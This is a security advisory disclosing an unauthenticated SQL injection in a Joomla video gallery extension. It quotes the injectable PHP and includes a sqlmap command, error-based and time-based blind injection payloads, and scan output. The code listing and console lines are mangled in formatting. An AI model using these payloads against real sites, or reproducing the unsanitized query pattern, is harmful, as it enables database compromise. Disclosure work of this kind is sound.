Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9for Joomla
Author: Larry W. Cashdollar, @_larry0
Date:2016-09-15
Download Site: http://huge-it.com/joomla-video-gallery/
Vendor: www.huge-it.com, fixed v1.1.0
Vendor Notified:2016-09-17
Vendor Contact: info@huge-it.com
Description: A video slideshow gallery.
Vulnerability:
The following code does not prevent an unauthenticated user from injecting SQL into functions located in ajax_url.php.
Vulnerable Code in: ajax_url.php
11 define('_JEXEC',1);12 defined('_JEXEC')or die('Restircted access');...28if($_POST['task']=="load_videos_content"){2930 $page =1;313233if(!empty($_POST["page"])&& is_numeric($_POST['page'])&& $_POST['page']>0){34 $paramssld='';35 $db5 = JFactory::getDBO();36 $query5 = $db->getQuery(true);37 $query5->select('*');38 $query5->from('#__huge_it_videogallery_params');39 $db->setQuery($query5);40 $options_params = $db5->loadObjectList();41 foreach ($options_params as $rowpar){42 $key = $rowpar->name;43 $value = $rowpar->value;44 $paramssld[$key]= $value;45}46 $page = $_POST["page"];47 $num=$_POST['perpage'];48 $start = $page * $num - $num;49 $idofgallery=$_POST['galleryid'];5051 $query = $db->getQuery(true);52 $query->select('*');53 $query->from('#__huge_it_videogallery_videos');54 $query->where('videogallery_id ='.$idofgallery);55 $query ->order('#__huge_it_videogallery_videos.ordering asc');56 $db->setQuery($query,$start,$num);
CVE-2016-1000123
Exploit Code:
aC/ $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php'--data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"--level=5--risk=3
aC/.
aC/.
aC/.
aC/(custom) POST parameter '#1*'is vulnerable. Do you want to keep testing the others (ifany)? [y/N]
aC/ sqlmap identified the following injection point(s)with a total of 2870 HTTP(s) requests:
aC/---
aC/ Parameter:#1* ((custom) POST)
aC/ Type: error-based
aC/ Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
aC/ Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2
aC/
aC/ Type: AND/OR time-based blind
aC/ Title: MySQL >=5.0.12 time-based blind - Parameter replace
aC/ Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
aC/---
aC/[19:36:55][INFO] the back-end DBMS is MySQL
aC/ web server operating system: Linux Debian 8.0(jessie)
aC/ web application technology: Apache 2.4.10
aC/ back-end DBMS: MySQL >=5.0.12
aC/[19:36:55][WARNING] HTTP error codes detected during run:
aC/500(Internal Server Error)-2714 times
aC/[19:36:55][INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
aC/
aC/[*] shutting down at 19:36:55
Advisory: http://www.vapidlabs.com/advisory.php?v=169
